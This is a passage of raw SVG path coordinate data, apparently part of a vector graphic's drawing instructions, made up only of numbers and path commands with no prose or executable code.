,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,